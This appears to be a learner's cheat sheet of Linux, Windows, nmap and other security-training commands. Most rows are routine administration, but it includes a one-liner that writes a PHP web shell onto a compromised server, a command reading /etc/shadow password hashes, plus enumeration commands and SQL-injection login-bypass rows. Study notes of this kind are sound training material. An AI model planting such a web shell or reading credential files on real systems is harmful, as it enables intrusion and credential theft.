|      | OS                     | Command                                                                                                                    | Function                                                                                                                                                                           |
|------|------------------------|----------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
|      |          Bash          |                                                           finger                                                           | provides detailed information about a specific user, including their login name, real name, terminal, idle time, login time, and other details like their home directory and shell |
|      |          Bash          |                                                     let count=count + 1                                                    | increment a variable count by 1                                                                                                                                                    |
|      |          bash          |                                                  tcpdump (Packet Sniffing)                                                 | Capture traffic from a specific port:                                                                                                                                              |
|      |          Linux         |                                                         2>/dev/null                                                        | clean up the output by suppressing any error messages that might occur due to permissions                                                                                          |
|      |          linux         |                                                             apt                                                            | handles dependencies, automatically downloads and installs packages from repositories, and resolves conflicts                                                                      |
| FULL |          Linux         |                                                     cat /etc/machine-id                                                    | obtain the machine ID                                                                                                                                                              |
| FULL |          Linux         |                                                     cat /etc/os-release                                                    | easy way to check the OS of a server or host                                                                                                                                       |
| FULL |          Linux         |                                                     cat /etc/os-release                                                    | View OS info.                                                                                                                                                                      |
|      |          linux         |                                                            cd /                                                            | move to root                                                                                                                                                                       |
|      |          Linux         |                                                            cron                                                            | set, view, and maintain scheduled tasks in Linux                                                                                                                                   |
| FULL |          Linux         |                                            cut -d : -f1 /etc/passwd \| tail -n 5                                           | list only users from the passwd file                                                                                                                                               |
|      |          Linux         |                                                             dig                                                            | • domain information groper • advanced DNS queries                                                                                                                                 |
|      |          Linux         |                                                            echo                                                            | Output any text that we provide                                                                                                                                                    |
|      |          Linux         |                                          echo '<?php system($_GET["c"]);?>'>c.php                                          | Create a PHP-shell on a server  (use AFTER gaining access)                                                                                                                         |
|      |          Linux         |                                                         enum4linux                                                         | find user names EASILY holy shit this makes it easy                                                                                                                                |
|      |          Linux         |                                                          Exiftool                                                          | Perl-based command-line utility with extensive capabilities for extracting and altering metadata from files by parsing their headers and embedded metadata structures              |
| FULL |          Linux         |                                              find / -iname “*.txt” 2>/dev/null                                             | find .txt files                                                                                                                                                                    |
| FULL |          Linux         |                                      find /home/ -type f -name ".viminfo" 2>/dev/null                                      | quickly list out all of the .viminfo files stored under the home directory                                                                                                         |
| FULL |          Linux         | gobuster dir -u http://$IP-ADDRESS -x html,txt,php,js,py -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt | good gobuster command for THM Attackbox                                                                                                                                            |
|      |          Linux         |                                                            grep                                                            | • search for anything in a file (specific keyword, etc) • search for any word or pattern inside a file                                                                             |
|      |          linux         |                                                          ifconfig                                                          | displays the configuration details of all network interfaces on the system                                                                                                         |
|      |          Linux         |                                                            last                                                            | tool for examining user logins and sessions                                                                                                                                        |
|      |          Linux         |                                                           lastlog                                                          | focuses on a user's most recent login activity and reads from the /var/log/lastlog file                                                                                            |
|      |          Linux         |                                                            ls -a                                                           | • lists the contents of the working directory • the -a flag shows all, including hidden  folders • list down the contents of a directory                                           |
| FULL |          Linux         |                                               ls -lh /usr/bin/ ls -lh /sbin/                                               | View all installed applications (two options)                                                                                                                                      |
|      |          Linux         |                                                         lsb_release                                                        | prints certain LSB (Linux Standard Base) and Distribution information                                                                                                              |
|      |          Linux         |                                                            lsof                                                            | list open files                                                                                                                                                                    |
|      |          Linux         |                                                            mkdir                                                           | make a directory (create a folder)                                                                                                                                                 |
|      |          Linux         |                                                            nano                                                            | edit a file                                                                                                                                                                        |
|      |          Linux         |                                                           ps -aux                                                          | ps is a command that shows the currently running processes on the system. The -aux options are used to show all processes with detailed information.                               |
| FULL |          Linux         |                                                           ps -eFH                                                          | combines several options to return a comprehensive overview of all processes running on the system in a hierarchical format                                                        |
|      |          Linux         |                                                           pstree                                                           | command-line utility that displays processes visually as a tree                                                                                                                    |
|      |          Linux         |                                                           strings                                                          | extracts strings of printable characters from files                                                                                                                                |
|      |          Linux         |                                                           sudo -l                                                          | Lists all allowed commands for the invoking user.                                                                                                                                  |
| FULL |          Linux         |                                                    sudo cat /etc/shadow                                                    | View password hashes for users.                                                                                                                                                    |
| FULL |          Linux         |                                                        sudo dpkg -l                                                        | determining which applications or programs have been installed on the system                                                                                                       |
| FULL |          Linux         |                                          sudo grep -i "failure" /var/log/auth.log                                          | find all failed login attempts                                                                                                                                                     |
| FULL |          Linux         |                                       sudo grep -i "session opened" /var/log/auth.log                                      | filter for sessions opened for a user                                                                                                                                              |
| FULL |          Linux         |                                                           sudo su                                                          | switches to the root account                                                                                                                                                       |
|      |          Linux         |                                                          sudo su -                                                         | obtain a root shell!! (or shell with superuser privileges)  literally just this simple command can provide root                                                                    |
| FULL |          Linux         |                                  sudo systemctl list-units --type=service --state=running                                  | view all currently running services                                                                                                                                                |
| FULL |          Linux         |                                          sudo systemctl status b4ckd00rftw.service                                         | query the service's status, metadata, and other configurations                                                                                                                     |
|      |          Linux         |                                                          systemctl                                                         | manages and monitors systemd services and the systemd init system (utility in Linux used for controlling systemd and service managers)                                             |
|      |          Linux         |                                                             top                                                            | provides a real-time view of the memory usage for a system on a per-process basis                                                                                                  |
|      |          Linux         |                                                            touch                                                           | create file                                                                                                                                                                        |
|      |          Linux         |                                                         Traceroute                                                         | command‐line tool that uses ICMP to trace the route that a packet takes to a host                                                                                                  |
|      |          Linux         |                                                              w                                                             | Shows who is logged in and what they are doing.                                                                                                                                    |
|      |       Linux Bash       |                                                             cat                                                            | Display the content of log files.                                                                                                                                                  |
|      |       Linux Bash       |                                                            grep                                                            | search for patterns within logs                                                                                                                                                    |
|      |       Linux Bash       |                                                         journalctl                                                         | essential tool for log parsing                                                                                                                                                     |
|      |       Linux Bash       |                                                             ps                                                             | List running processes.                                                                                                                                                            |
|      |       Linux Bash       |                                                             ss                                                             | Another command to view network connections, more efficient than netstat.                                                                                                          |
|      |       Linux Bash       |                                                            tail                                                            | Monitor Logs in Real-Time                                                                                                                                                          |
|      |       Linux Bash       |                                                             top                                                            | Display resource usage and running processes (real-time).                                                                                                                          |
|      |     Linux operator     |                                                              &                                                             | This operator allows you to run commands in the background of your terminal.                                                                                                       |
|      |     Linux operator     |                                                             &&                                                             | This operator allows you to combine multiple commands together in one line of your terminal.                                                                                       |
|      |     Linux operator     |                                                              >                                                             | This operator is a redirector - meaning that we can take the output from a command (such as using cat to output a file) and direct it elsewhere.                                   |
|      |         Linux          |                                                         hostnamectl                                                        | query and change the system hostname and related settings                                                                                                                          |
|      |         Linux          |                                                          iptables                                                          | Block an IP address                                                                                                                                                                |
|      |         Linux          |                                                          uname -a                                                          | extract basic information about the system                                                                                                                                         |
|      |         Netcat         |                                                          Netcat nc                                                         | Test a connection to a specific port                                                                                                                                               |
|      |          Nmap          |                                                            Nmap                                                            | scan a target IP for open ports                                                                                                                                                    |
|      |          Nmap          |                                                           Nmap -p                                                          | Scan a specific port                                                                                                                                                               |
|      |          Nmap          |                                                          Nmap -sV                                                          | Service detection                                                                                                                                                                  |
|      |          nmap          |                                                nmap -A (comprehensive scan)                                                | runs an aggressive scan, which includes: OS detection, Version detection, Script scanning                                                                                          |
|      |          nmap          |                                                    nmap -sC -sV -p- -vv                                                    | sC = run scripts, sV = find service & version -p- = all ports (even above 10,000) -v v = very verbose                                                                              |
|      |          nmap          |                                                     nmap -sS (stealth)                                                     | SYN Scan (stealth scan, only sends SYN packets):                                                                                                                                   |
|      |          nmap          |                                                     nmap -sT (default)                                                     | TCP Connect Scan (default scan type)                                                                                                                                               |
|      |          nmap          |                                                nmap -sV --reason <TARGET_IP>                                               | — sV [service & version] -- reason [more information]                                                                                                                              |
|      |       Powershell       |                                                          Get & set                                                         | retrieves files and specifies the current directory                                                                                                                                |
|      |         Windows        |                                                           cd . .                                                           | change directory; go up one level [one folder up]                                                                                                                                  |
|      |         Windows        |                                                           netstat                                                          | displays current network connections and listening ports                                                                                                                           |
|      |         Windows        |                                                          nslookup                                                          | looks up a host or domain and returns its IP address                                                                                                                               |
|      |         Windows        |                                                            ping                                                            | • used for network troubleshooting • checking  for access a to particular server on the Internet                                                                                   |
|      |         Windows        |                                                          sc query                                                          | service discovery list all running services on a Windows system                                                                                                                    |
|      | Windows Command Prompt |                                                           findstr                                                          | command can be used to search log files for specific strings (e.g., "error," "failed," "critical")                                                                                 |
|      | Windows Command Prompt |                                                          ipconfig                                                          | View network configuration details.                                                                                                                                                |
|      | Windows Command Prompt |                                                           netstat                                                          | View network connections and listening ports. (display protocol statistics and current TCP/IP network connections)                                                                 |
|      | Windows Command Prompt |                                                            ping                                                            | Test network connectivity.                                                                                                                                                         |
|      |   Windows Powershell   |                                                        Get-EventLog                                                        | pulls event logs                                                                                                                                                                   |
|      |   Windows Powershell   |                                                       Select-String                                                        | pattern matching                                                                                                                                                                   |
|      |    Windows Firewall    |                                                     New-NetFirewallRule                                                    | Block an incoming connection on port 80 (HTTP)                                                                                                                                     |
|      |                        |                                                Common SQL injection PAYLOAD                                                | use to bypass login pages (enter into username)                                                                                                                                    |
|      |                        |                                                  example of SQL injection                                                  | Find username:password combos from a databse.                                                                                                                                      |
|      |                        |                                             Two ways to search for Nmap scripts                                            | find nmap scripts [example is looking for ftp scripts]                                                                                                                             |
|      |                        |                                                                                                                            |                                                                                                                                                                                    |
|      |                        |                                                                                                                            |                                                                                                                                                                                    |
|      |                        |                                                                                                                            |                                                                                                                                                                                    |
|      |                        |                                                                                                                            |                                                                                                                                                                                    |
